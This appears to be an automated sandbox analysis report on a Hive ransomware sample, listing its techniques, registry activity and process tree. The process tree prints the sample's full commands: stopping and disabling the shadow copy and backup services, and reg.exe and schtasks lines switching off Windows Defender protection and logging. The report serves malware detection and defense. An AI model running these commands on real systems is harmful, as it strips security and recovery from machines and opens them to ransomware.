Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
4192	vssadmin.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133883648206050820"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	tor-browser-windows-x86_64-portable-14.0.9.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
516	NOTEPAD.EXE
384	notepad.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4548	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3944	powershell.exe
3944	powershell.exe
3944	powershell.exe
1792	powershell.exe
1792	powershell.exe
1792	powershell.exe
3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1832	7zFM.exe
1920	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
6112	chrome.exe
6112	chrome.exe
6112	chrome.exe
6112	chrome.exe
6112	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1832	7zFM.exe
Token: 35	1832	7zFM.exe
Token: SeSecurityPrivilege	1832	7zFM.exe
Token: SeSecurityPrivilege	400	wevtutil.exe
Token: SeBackupPrivilege	400	wevtutil.exe
Token: SeSecurityPrivilege	2432	wevtutil.exe
Token: SeBackupPrivilege	2432	wevtutil.exe
Token: SeSecurityPrivilege	3576	wevtutil.exe
Token: SeBackupPrivilege	3576	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	1076	wmic.exe
Token: SeSecurityPrivilege	1076	wmic.exe
Token: SeTakeOwnershipPrivilege	1076	wmic.exe
Token: SeLoadDriverPrivilege	1076	wmic.exe
Token: SeSystemProfilePrivilege	1076	wmic.exe
Token: SeSystemtimePrivilege	1076	wmic.exe
Token: SeProfSingleProcessPrivilege	1076	wmic.exe
Token: SeIncBasePriorityPrivilege	1076	wmic.exe
Token: SeCreatePagefilePrivilege	1076	wmic.exe
Token: SeBackupPrivilege	1076	wmic.exe
Token: SeRestorePrivilege	1076	wmic.exe
Token: SeShutdownPrivilege	1076	wmic.exe
Token: SeDebugPrivilege	1076	wmic.exe
Token: SeSystemEnvironmentPrivilege	1076	wmic.exe
Token: SeRemoteShutdownPrivilege	1076	wmic.exe
Token: SeUndockPrivilege	1076	wmic.exe
Token: SeManageVolumePrivilege	1076	wmic.exe
Token: 33	1076	wmic.exe
Token: 34	1076	wmic.exe
Token: 35	1076	wmic.exe
Token: 36	1076	wmic.exe
Token: SeIncreaseQuotaPrivilege	2816	wmic.exe
Token: SeSecurityPrivilege	2816	wmic.exe
Token: SeTakeOwnershipPrivilege	2816	wmic.exe
Token: SeLoadDriverPrivilege	2816	wmic.exe
Token: SeSystemProfilePrivilege	2816	wmic.exe
Token: SeSystemtimePrivilege	2816	wmic.exe
Token: SeProfSingleProcessPrivilege	2816	wmic.exe
Token: SeIncBasePriorityPrivilege	2816	wmic.exe
Token: SeCreatePagefilePrivilege	2816	wmic.exe
Token: SeBackupPrivilege	2816	wmic.exe
Token: SeRestorePrivilege	2816	wmic.exe
Token: SeShutdownPrivilege	2816	wmic.exe
Token: SeDebugPrivilege	2816	wmic.exe
Token: SeSystemEnvironmentPrivilege	2816	wmic.exe
Token: SeRemoteShutdownPrivilege	2816	wmic.exe
Token: SeUndockPrivilege	2816	wmic.exe
Token: SeManageVolumePrivilege	2816	wmic.exe
Token: 33	2816	wmic.exe
Token: 34	2816	wmic.exe
Token: 35	2816	wmic.exe
Token: 36	2816	wmic.exe
Token: SeIncreaseQuotaPrivilege	2816	wmic.exe
Token: SeSecurityPrivilege	2816	wmic.exe
Token: SeTakeOwnershipPrivilege	2816	wmic.exe
Token: SeLoadDriverPrivilege	2816	wmic.exe
Token: SeSystemProfilePrivilege	2816	wmic.exe
Token: SeSystemtimePrivilege	2816	wmic.exe
Token: SeProfSingleProcessPrivilege	2816	wmic.exe
Token: SeIncBasePriorityPrivilege	2816	wmic.exe
Token: SeCreatePagefilePrivilege	2816	wmic.exe
Token: SeBackupPrivilege	2816	wmic.exe
Token: SeRestorePrivilege	2816	wmic.exe
Token: SeShutdownPrivilege	2816	wmic.exe
Token: SeDebugPrivilege	2816	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1832	7zFM.exe
1832	7zFM.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe
1920	taskmgr.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe
4860	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3416 wrote to memory of 4792	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	101
PID 3416 wrote to memory of 4792	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	101
PID 4792 wrote to memory of 5784	4792	net.exe	103
PID 4792 wrote to memory of 5784	4792	net.exe	103
PID 3416 wrote to memory of 5856	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	104
PID 3416 wrote to memory of 5856	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	104
PID 5856 wrote to memory of 1660	5856	net.exe	106
PID 5856 wrote to memory of 1660	5856	net.exe	106
PID 3416 wrote to memory of 4380	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	107
PID 3416 wrote to memory of 4380	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	107
PID 4380 wrote to memory of 2440	4380	net.exe	109
PID 4380 wrote to memory of 2440	4380	net.exe	109
PID 3416 wrote to memory of 5220	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	110
PID 3416 wrote to memory of 5220	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	110
PID 5220 wrote to memory of 3080	5220	net.exe	112
PID 5220 wrote to memory of 3080	5220	net.exe	112
PID 3416 wrote to memory of 5332	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	113
PID 3416 wrote to memory of 5332	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	113
PID 5332 wrote to memory of 1088	5332	net.exe	115
PID 5332 wrote to memory of 1088	5332	net.exe	115
PID 3416 wrote to memory of 5872	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	116
PID 3416 wrote to memory of 5872	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	116
PID 5872 wrote to memory of 3812	5872	net.exe	118
PID 5872 wrote to memory of 3812	5872	net.exe	118
PID 3416 wrote to memory of 5908	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	119
PID 3416 wrote to memory of 5908	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	119
PID 5908 wrote to memory of 1932	5908	net.exe	121
PID 5908 wrote to memory of 1932	5908	net.exe	121
PID 3416 wrote to memory of 3936	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	122
PID 3416 wrote to memory of 3936	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	122
PID 3936 wrote to memory of 1592	3936	net.exe	124
PID 3936 wrote to memory of 1592	3936	net.exe	124
PID 3416 wrote to memory of 6096	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	125
PID 3416 wrote to memory of 6096	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	125
PID 3416 wrote to memory of 2932	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	127
PID 3416 wrote to memory of 2932	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	127
PID 3416 wrote to memory of 5212	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	129
PID 3416 wrote to memory of 5212	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	129
PID 3416 wrote to memory of 5132	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	131
PID 3416 wrote to memory of 5132	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	131
PID 3416 wrote to memory of 1240	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	133
PID 3416 wrote to memory of 1240	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	133
PID 3416 wrote to memory of 4472	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	135
PID 3416 wrote to memory of 4472	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	135
PID 3416 wrote to memory of 1596	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	137
PID 3416 wrote to memory of 1596	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	137
PID 3416 wrote to memory of 2780	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	139
PID 3416 wrote to memory of 2780	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	139
PID 3416 wrote to memory of 5764	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	141
PID 3416 wrote to memory of 5764	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	141
PID 3416 wrote to memory of 3844	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	143
PID 3416 wrote to memory of 3844	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	143
PID 3416 wrote to memory of 3900	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	145
PID 3416 wrote to memory of 3900	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	145
PID 3416 wrote to memory of 4044	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	147
PID 3416 wrote to memory of 4044	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	147
PID 3416 wrote to memory of 1988	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	149
PID 3416 wrote to memory of 1988	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	149
PID 3416 wrote to memory of 652	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	151
PID 3416 wrote to memory of 652	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	151
PID 3416 wrote to memory of 1092	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	153
PID 3416 wrote to memory of 1092	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	153
PID 3416 wrote to memory of 3040	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	155
PID 3416 wrote to memory of 3040	3416	Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe	155

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.7z"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1832

C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe
"C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3416
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:5784
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:1660
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:2440
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "vmicvss" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "vmicvss" /y
    3⤵
    PID:3080
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:1088
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:3812
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5908
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:1932
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "UnistoreSvc_2a6b6" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UnistoreSvc_2a6b6" /y
    3⤵
    PID:1592
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:6096
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  PID:2932
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  PID:5212
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "vmicvss" start= disabled
  2⤵
  - Launches sc.exe
  PID:5132
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  PID:1240
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  PID:4472
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  PID:1596
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "UnistoreSvc_2a6b6" start= disabled
  2⤵
  - Launches sc.exe
  PID:2780
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:5764
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:3844
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender DisableAntiSpyware settings
  PID:3900
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:4044
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:1988
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:652
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1092
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:3040
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:3044
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:396
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:1996
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:5644
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:5932
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:5248
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:3912
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:440
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:5452
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:2912
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:864
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:4828
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:5208
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:992
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:2276
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
